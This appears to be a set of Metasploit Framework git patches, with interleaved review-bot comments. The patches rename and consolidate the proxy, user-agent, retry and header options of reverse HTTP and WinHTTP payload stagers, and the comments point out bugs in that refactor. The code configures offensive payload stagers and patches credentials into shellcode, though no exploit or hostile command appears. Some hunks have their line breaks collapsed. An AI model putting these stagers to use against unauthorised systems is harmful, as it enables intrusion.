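Review bot: `OptPort.new('HttpProxyPort', [ true, "The proxy port to connect to", 8080 ], aliases: ['PayloadProxyHost'])` aliases the port option to the old host name; it should read `aliases: ['PayloadProxyPort']`, as the multi and windows hunks in this commit do. As written, a previously saved `PayloadProxyPort` value is no longer picked up by the Python stager, and `PayloadProxyHost` resolves to two different options in this file. The `@@ -29,9 +29,9 @@` hunk of the same file reads `ds['HttpProxyPort']` and so inherits the gap.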
@@ -29,9 +29,9 @@ module Payload::Python::ReverseHttp
 opts.merge!({
 host: ds['LHOST'] || '127.127.127.127',
 port: ds['LPORT'],
- proxy_host: ds['PayloadProxyHost'],
- proxy_port: ds['PayloadProxyPort'],
- user_agent: ds['MeterpreterUserAgent'],
+ proxy_host: ds['HttpProxyHost'],
+ proxy_port: ds['HttpProxyPort'],
+ user_agent: ds['HttpUserAgent'],
 header_host: ds['HttpHeaderHost'],
 header_cookie: ds['HttpHeaderCookie'],
 header_referer: ds['HttpHeaderReferer']
diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index 3c9972c0cf..284347e1cb 100644
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -60,12 +60,12 @@ module Msf::Payload::TransportConfig
 lhost: opts[:lhost] || ds['LHOST'],
 lport: (opts[:lport] || ds['LPORT']).to_i,
 uri: uri,
- ua: ds['MeterpreterUserAgent'],
- proxy_host: ds['PayloadProxyHost'],
- proxy_port: ds['PayloadProxyPort'],
- proxy_type: ds['PayloadProxyType'],
- proxy_user: ds['PayloadProxyUser'],
- proxy_pass: ds['PayloadProxyPass'],
+ ua: ds['HttpUserAgent'],
+ proxy_host: ds['HttpProxyHost'],
+ proxy_port: ds['HttpProxyPort'],
+ proxy_type: ds['HttpProxyType'],
+ proxy_user: ds['HttpProxyUser'],
+ proxy_pass: ds['HttpProxyPass'],
 custom_headers: get_custom_headers(ds)
 }.merge(timeout_config(opts))
 end
diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
index 5ee674b3ac..3d6729b199 100644
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -32,14 +32,14 @@ module Payload::Windows::ReverseHttp
 OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10],
 aliases: ['ReverseConnectRetries']),
 OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]),
- OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']),
- OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
- OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
- OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
- OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]),
- OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
- OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
- OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
+ OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']),
+ OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']),
+ OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']),
+ OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']),
+ OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']),
+ OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'),
+ OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'),
+ OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header')
 ], self.class)
 end
@@ -60,12 +60,12 @@ module Payload::Windows::ReverseHttp
 if self.available_space.nil? || required_space <= self.available_space
 conf[:url] = luri + generate_uri(opts)
 conf[:exitfunk] = ds['EXITFUNC']
- conf[:ua] = ds['MeterpreterUserAgent']
- conf[:proxy_host] = ds['PayloadProxyHost']
- conf[:proxy_port] = ds['PayloadProxyPort']
- conf[:proxy_user] = ds['PayloadProxyUser']
- conf[:proxy_pass] = ds['PayloadProxyPass']
- conf[:proxy_type] = ds['PayloadProxyType']
+ conf[:ua] = ds['HttpUserAgent']
+ conf[:proxy_host] = ds['HttpProxyHost']
+ conf[:proxy_port] = ds['HttpProxyPort']
+ conf[:proxy_user] = ds['HttpProxyUser']
+ conf[:proxy_pass] = ds['HttpProxyPass']
+ conf[:proxy_type] = ds['HttpProxyType']
 conf[:custom_headers] = get_custom_headers(ds)
 else
 # Otherwise default to small URIs
diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index f30dbefa15..380a3141da 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -21,7 +21,7 @@ module Payload::Windows::ReverseWinHttp
 def initialize(*args)
 super
 register_advanced_options([
- OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true])
+ OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE'])
 ], self.class)
 end
@@ -41,13 +41,13 @@ module Payload::Windows::ReverseWinHttp
 conf[:uri] = luri + generate_uri
 conf[:exitfunk] = ds['EXITFUNC']
 conf[:verify_cert_hash] = opts[:verify_cert_hash]
- conf[:proxy_host] = ds['PayloadProxyHost']
- conf[:proxy_port] = ds['PayloadProxyPort']
- conf[:proxy_user] = ds['PayloadProxyUser']
- conf[:proxy_pass] = ds['PayloadProxyPass']
- conf[:proxy_type] = ds['PayloadProxyType']
+ conf[:proxy_host] = ds['HttpProxyHost']
+ conf[:proxy_port] = ds['HttpProxyPort']
+ conf[:proxy_user] = ds['HttpProxyUser']
+ conf[:proxy_pass] = ds['HttpProxyPass']
+ conf[:proxy_type] = ds['HttpProxyType']
 conf[:retry_count] = ds['StagerRetryCount']
- conf[:proxy_ie] = ds['PayloadProxyIE']
+ conf[:proxy_ie] = ds['HttpProxyIE']
 conf[:custom_headers] = get_custom_headers(ds)
 else
 # Otherwise default to small URIs
diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb
index 4821709236..4182e80e31 100644
--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -32,14 +32,14 @@ module Payload::Windows::ReverseHttp_x64
 OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10],
 aliases: ['ReverseConnectRetries']),
 OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]),
- OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']),
- OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
- OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
- OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
- OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]),
- OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
- OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
- OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
+ OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']),
+ OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']),
+ OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']),
+ OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']),
+ OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']),
+ OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'),
+ OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'),
+ OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header')
 ], self.class)
 end
@@ -65,12 +65,12 @@ module Payload::Windows::ReverseHttp_x64 if self.available_space.nil? || required_space <= self.available_space conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:ua] = ds['HttpUserAgent'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb index 358115e464..419946be1e 100644 --- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb @@ -22,7 +22,7 @@ module Payload::Windows::ReverseWinHttp_x64 def initialize(*args) super register_advanced_options([ - OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true]) + OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end 
@@ -42,13 +42,13 @@ module Payload::Windows::ReverseWinHttp_x64 conf[:uri] = luri + generate_uri conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] conf[:retry_count] = ds['StagerRetryCount'] - conf[:proxy_ie] = ds['PayloadProxyIE'] + conf[:proxy_ie] = ds['HttpProxyIE'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index 766c741332..ba77689d2a 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -80,8 +80,8 @@ module MetasploitModule p[i, u.length] = u # patch proxy info - proxyhost = datastore['PayloadProxyHost'].to_s - proxyport = datastore['PayloadProxyPort'].to_s || "8080" + proxyhost = datastore['HttpProxyHost'].to_s + proxyport = datastore['HttpProxyPort'].to_s || "8080" if Rex::Socket.is_ipv6?(proxyhost) proxyhost = "[#{proxyhost}]" @@ -91,7 +91,7 @@ module MetasploitModule if proxyport == "80" proxyinfo = proxyhost end - if datastore['PayloadProxyType'].to_s == 'HTTP' + if datastore['HttpProxyType'].to_s == 'HTTP' proxyinfo = 'http://' + proxyinfo else #socks proxyinfo = 'socks=' + proxyinfo 
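Review bot: The fallback on the `proxyport` line of the `@@ -80` hunk in reverse_https_proxy.rb can never fire: `datastore['HttpProxyPort'].to_s` returns `""` rather than `nil` when the option is unset, and an empty string is truthy in Ruby, so an absent port yields a `host:` proxy string instead of `host:8080`. Move the default inside the conversion, `proxyport = (datastore['HttpProxyPort'] || 8080).to_s`. The dead `|| "8080"` predates the rename and is carried over unchanged by this commit. The enclosing method starts and ends outside the hunk.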
@@ -105,22 +105,22 @@ module MetasploitModule p[proxyloc-4] = [calloffset].pack('V')[0] # Authentication credentials have not been specified - if datastore['PayloadProxyUser'].to_s == '' or - datastore['PayloadProxyPass'].to_s == '' or - datastore['PayloadProxyType'].to_s == 'SOCKS' + if datastore['HttpProxyUser'].to_s == '' || + datastore['HttpProxyPass'].to_s == '' || + datastore['HttpProxyType'].to_s == 'SOCKS' jmp_offset = p.index("PROXY_AUTH_STOP") + 15 - p.index("PROXY_AUTH_START") # Remove the authentication code p = p.gsub(/PROXY_AUTH_START(.)*PROXY_AUTH_STOP/i, "") else - username_size_diff = 14 - datastore['PayloadProxyUser'].to_s.length - password_size_diff = 14 - datastore['PayloadProxyPass'].to_s.length + username_size_diff = 14 - datastore['HttpProxyUser'].to_s.length + password_size_diff = 14 - datastore['HttpProxyPass'].to_s.length jmp_offset = 16 + # PROXY_AUTH_START length 15 + # PROXY_AUTH_STOP length - username_size_diff + # Difference between datastore PayloadProxyUser length and db "PayloadProxyUser length" - password_size_diff # Same with PayloadProxyPass + username_size_diff + # Difference between datastore HttpProxyUser length and db "HttpProxyUser length" + password_size_diff # Same with HttpProxyPass # Patch call offset username_loc = p.index("PROXY_USERNAME") @@ -131,8 +131,8 @@ module MetasploitModule # Remove markers & change login/password p = p.gsub("PROXY_AUTH_START","") p = p.gsub("PROXY_AUTH_STOP","") - p = p.gsub("PROXY_USERNAME", datastore['PayloadProxyUser'].to_s) - p = p.gsub("PROXY_PASSWORD", datastore['PayloadProxyPass'].to_s) + p = p.gsub("PROXY_USERNAME", datastore['HttpProxyUser'].to_s) + p = p.gsub("PROXY_PASSWORD", datastore['HttpProxyPass'].to_s) end # Patch jmp dbl_get_server_host From 2076db2d6170515e6ed107fd7d9198f3016a7cc2 Mon Sep 17 00:00:00 2001 
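Review bot: `username_size_diff` and `password_size_diff` in the `@@ -105` hunk are computed with `String#length`, which counts characters, while the credential is later spliced into the shellcode as raw bytes; a username or password containing multibyte characters therefore shifts `jmp_offset` by the difference between character count and byte count. Use `.bytesize` on both lines, e.g. `username_size_diff = 14 - datastore['HttpProxyUser'].to_s.bytesize`. There is also no check that the value fits whatever room the assembled stub has for it; if the layout bounds the length, raising a clear error when it is exceeded would beat emitting a silently corrupt stager. The enclosing method starts and ends outside the hunk.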
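Review bot: The two `gsub` calls that substitute `PROXY_USERNAME` and `PROXY_PASSWORD` in the `@@ -131` hunk pass the operator-supplied credential as a string replacement, and Ruby interprets backslash sequences such as `\0`, `\&` and `\\` in a string replacement argument, so a password containing a backslash is altered before it reaches the stager. Use the block form, which inserts the value literally: `p = p.gsub("PROXY_USERNAME") { datastore['HttpProxyUser'].to_s }` and `p = p.gsub("PROXY_PASSWORD") { datastore['HttpProxyPass'].to_s }`. The enclosing method continues outside the hunk.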
From: Brent Cook Date: Thu, 21 Sep 2017 02:38:17 -0500 Subject: [PATCH 175/254] DRY up common stager and payload http and retry options --- lib/msf/core/handler/reverse_tcp.rb | 12 +--- lib/msf/core/opt.rb | 67 ++++++++++++++++++- lib/msf/core/payload/android/reverse_http.rb | 6 +- lib/msf/core/payload/java/reverse_http.rb | 14 ++-- lib/msf/core/payload/multi/reverse_http.rb | 15 ++--- .../core/payload/python/meterpreter_loader.rb | 21 ++++-- lib/msf/core/payload/python/reverse_http.rb | 12 ++-- lib/msf/core/payload/python/reverse_tcp.rb | 6 +- .../core/payload/python/reverse_tcp_ssl.rb | 6 +- lib/msf/core/payload/windows/reverse_http.rb | 20 ++---- .../core/payload/windows/x64/reverse_http.rb | 20 ++---- 11 files changed, 114 insertions(+), 85 deletions(-) diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index d938d46934..2cba8cf02a 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -45,15 +45,6 @@ module ReverseTcp # XXX: Not supported by all modules register_advanced_options( [ - OptInt.new( - 'StagerRetryCount', - [ true, 'The number of connection attempts to try before exiting the process', 10 ], - aliases: ['ReverseConnectRetries'] - ), - OptFloat.new( - 'StagerRetryWait', - [ false, 'Number of seconds to wait for the stager between reconnect attempts', 5.0 ] - ), OptAddress.new( 'ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system' ] @@ -62,7 +53,8 @@ module ReverseTcp 'ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false ] ) - ], + ] + + Msf::Opt::stager_retry_options, Msf::Handler::ReverseTcp ) diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3d622aff72..3009710a1e 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb 
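Review bot: Replacing the handler's own options with `Msf::Opt::stager_retry_options` in the `@@ -62` hunk changes two option contracts that the removed lines in the `@@ -45` hunk made explicit: `StagerRetryWait` goes from `OptFloat` with default `5.0` to `OptInt` with default `5`, so sub-second waits that used to validate are now rejected, and `StagerRetryCount` is no longer required. If fractional waits are meant to stay supported, the shared definition should read `OptFloat.new('StagerRetryWait', 'Number of seconds to wait for the stager between reconnect attempts', default: 5.0)`; otherwise the commit message should say that resource scripts setting `StagerRetryWait 0.5` will start failing validation. The handler-specific description "connection attempts to try before exiting the process" is also replaced by the generic stager wording. The `register_advanced_options` call spans both hunks and the enclosing method starts outside them.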
@@ -59,12 +59,77 @@ module Msf # @return [OptEnum] def self.SSLVersion - Msf::OptEnum.new('SSLVersion', + Msf::OptEnum.new( + 'SSLVersion', 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', enums: self.ssl_supported_options ) end + def self.stager_retry_options + [ + OptInt.new( + 'StagerRetryCount', + 'The number of times the stager should retry if the first connect fails', + default: 10, + aliases: ['ReverseConnectRetries'] + ), + OptInt.new( + 'StagerRetryWait', + 'Number of seconds to wait for the stager between reconnect attempts', + default: 5 + ) + ] + end + + def self.http_proxy_options + [ + OptString.new( + 'HttpProxyHost', + 'An optional proxy server IP address or hostname', + aliases: ['PayloadProxyHost'] + ), + OptPort.new( + 'HttpProxyPort', + 'An optional proxy server port', + aliases: ['PayloadProxyPort'] + ), + OptString.new( + 'HttpProxyUser', + 'An optional proxy server username', + aliases: ['PayloadProxyUser'] + ), + OptString.new( + 'HttpProxyPass', + 'An optional proxy server password', + aliases: ['PayloadProxyPass'] + ), + OptEnum.new( + 'HttpProxyType', + 'The type of HTTP proxy', + enums: ['HTTP', 'SOCKS'], + aliases: ['PayloadProxyType'] + ) + ] + end + + def self.http_header_options + [ + OptString.new( + 'HttpHeaderHost', + 'An optional value to use for the Host HTTP header' + ), + OptString.new( + 'HttpHeaderCookie', + 'An optional value to use for the Cookie HTTP header' + ), + OptString.new( + 'HttpHeaderReferer', + 'An optional value to use for the Referer HTTP header' + ) + ] + end + CHOST = CHOST() CPORT = CPORT() LHOST = LHOST() diff --git a/lib/msf/core/payload/android/reverse_http.rb b/lib/msf/core/payload/android/reverse_http.rb index e75e4618a3..88777d355e 100644 --- a/lib/msf/core/payload/android/reverse_http.rb +++ b/lib/msf/core/payload/android/reverse_http.rb 
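Review bot: The three new helpers `stager_retry_options`, `http_proxy_options` and `http_header_options` carry no documentation, while the neighbouring `SSLVersion` in this file has a YARD `# @return [OptEnum]` tag; give each a matching header, e.g. `# Retry options shared by stagers that reconnect after a failed first connect.` followed by `# @return [Array<Msf::OptBase>] freshly built option objects`. The "freshly built" part matters: every call constructs new option instances, which is what `register_advanced_options` needs, and a one-line comment discourages a later refactor that memoises the array into a constant and shares mutable option objects across modules. `HttpProxyPass` is a plain `OptString`, so the proxy password is echoed by `show advanced` and persisted in plaintext by `save`; if the framework offers a masked option type it belongs here, otherwise a comment noting the exposure is warranted. The `CHOST`/`CPORT` constants after the insertion are untouched context.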
@@ -23,11 +23,7 @@ module Payload::Android::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) - ], self.class) + register_advanced_options(Msf::Opt::http_header_options) end # diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index b0c1fc0d66..297184e92d 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -23,13 +23,13 @@ module Payload::Java::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']), - ]) + register_advanced_options( + [ + OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), + OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), + ] + + Msf::Opt::http_header_options + ) end # diff --git a/lib/msf/core/payload/multi/reverse_http.rb b/lib/msf/core/payload/multi/reverse_http.rb index 9d9f45de1c..1acb8f94e1 100644 --- a/lib/msf/core/payload/multi/reverse_http.rb +++ b/lib/msf/core/payload/multi/reverse_http.rb 
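Review bot: The Java stager's `initialize` in the `@@ -23` hunk now mixes two option styles in one array: `OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2])` and `StagerURILength` keep the positional `[required, desc, default]` form while the appended `Msf::Opt::http_header_options` use keyword arguments, as does every other file touched by this commit. Converting the two survivors, `OptInt.new('Spawn', 'Number of subprocesses to spawn', required: true, default: 2)` and `OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)')`, keeps the file consistent with the rest of the series. The `register_advanced_options` call is complete within the hunk; the enclosing method starts outside it.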
@@ -22,15 +22,12 @@ module Payload::Multi::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)'), - OptInt.new('StagerRetryCount', 'The number of times the stager should retry if the first connect fails', default: 10, aliases: ['ReverseConnectRetries']), - OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), - OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), - OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']) - ]) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 0b8c97210b..7f4935bc4b 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb 
@@ -28,13 +28,20 @@ module Payload::Python::MeterpreterLoader 'Stager' => {'Payload' => ""} )) - register_advanced_options([ - OptBool.new('MeterpreterTryToFork', [ true, 'Fork a new process if the functionality is available', true ]), - OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) - ], self.class) + register_advanced_options( + [ + OptBool.new( + 'MeterpreterTryToFork', + 'Fork a new process if the functionality is available', + default: true + ), + OptBool.new( + 'PythonMeterpreterDebug', + 'Enable debugging for the Python meterpreter' + ), + ] + + Msf::Opt::http_header_options + ) end def stage_payload(opts={}) diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 9dac5a71cd..30a0e34fe3 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -11,14 +11,10 @@ module Payload::Python::ReverseHttp def initialize(info = {}) super(info) - register_options( - [ - OptString.new('HttpProxyHost', [ false, "The proxy server's IP address" ], aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', [ true, "The proxy port to connect to", 8080 ], aliases: ['PayloadProxyHost']), - OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), - OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), - OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) - ], self.class) + register_advanced_options( + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # 
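Review bot: `PythonMeterpreterDebug` in the `@@ -28` hunk loses the explicit `false` default that the removed `[ true, ..., false ]` form carried, while its sibling `MeterpreterTryToFork` keeps `default: true`; the option now evaluates to `nil` rather than `false` and shows up empty in `show advanced`. Keep the two consistent with `OptBool.new('PythonMeterpreterDebug', 'Enable debugging for the Python meterpreter', default: false)`. The `register_advanced_options` call is complete within the hunk; the enclosing `initialize` starts outside it.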
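Review bot: Switching the Python stager's proxy options from `register_options` to `register_advanced_options` via `Msf::Opt::http_proxy_options` in the `@@ -11` hunk drops the `required: true` and the `8080` default that the removed `HttpProxyPort` line carried; a user who sets only `HttpProxyHost` now gets a `nil` port, and the loader in this same series builds the proxy URL by plain interpolation, producing `http://host:`. Either register a module-local default after the shared set, `OptPort.new('HttpProxyPort', 'The proxy port to connect to', default: 8080, aliases: ['PayloadProxyPort'])`, or validate host and port together before the URL is built. Moving these from basic to advanced options also hides them from `show options`, a behaviour change worth one line in the commit message. The enclosing `initialize` is complete within the hunk.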
diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb index 8369602654..77481ecbb3 100644 --- a/lib/msf/core/payload/python/reverse_tcp.rb +++ b/lib/msf/core/payload/python/reverse_tcp.rb @@ -18,11 +18,7 @@ module Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index ee65afe0ab..b1fcecdde7 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -17,11 +17,7 @@ module Payload::Python::ReverseTcpSsl include Msf::Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 3d6729b199..c5895d9f2a 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb 
@@ -27,20 +27,12 @@ module Payload::Windows::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), - OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), - OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), - OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'), - OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'), - OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header') - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index 4182e80e31..f31cf1ca24 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb 
